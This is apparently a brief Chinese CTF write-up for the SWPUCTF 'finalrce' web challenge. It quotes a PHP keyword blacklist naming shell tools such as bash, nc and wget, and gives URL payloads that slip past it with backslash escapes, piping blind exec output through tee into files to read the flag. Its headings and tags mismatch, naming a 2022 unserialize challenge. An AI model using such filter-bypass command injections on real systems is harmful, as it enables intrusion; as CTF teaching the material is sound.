🐈
🐈

【SWPUCTF 2021 新生赛】finalrce

 included in Web · 2024做题
 About 100 words One minute 
Contents

[SWPUCTF 2022 新生赛]1z_unserialize

思路

  • 主要问题:

    1. 过滤很多关键字,但是反斜杠未被过滤,使用转义符进行绕过

      1

      preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url)

    2. 使用exec($url);执行命令,不能直接回显,需要管道符+tee重定向写入文件进行回显查看

EXP

?url=ls /|tee 1.txt # 得到目录

?url=ca\t /flllll\aaaaaaggggggg|tee 2.txt; # 得到flag

总结

  • 考察无回显RCE
  • WAF绕过
Updated on 2024-07-01 
CC BY-NC-SA 4.0
Read Markdown
Web做题PHP反序列化
Back | Home
0%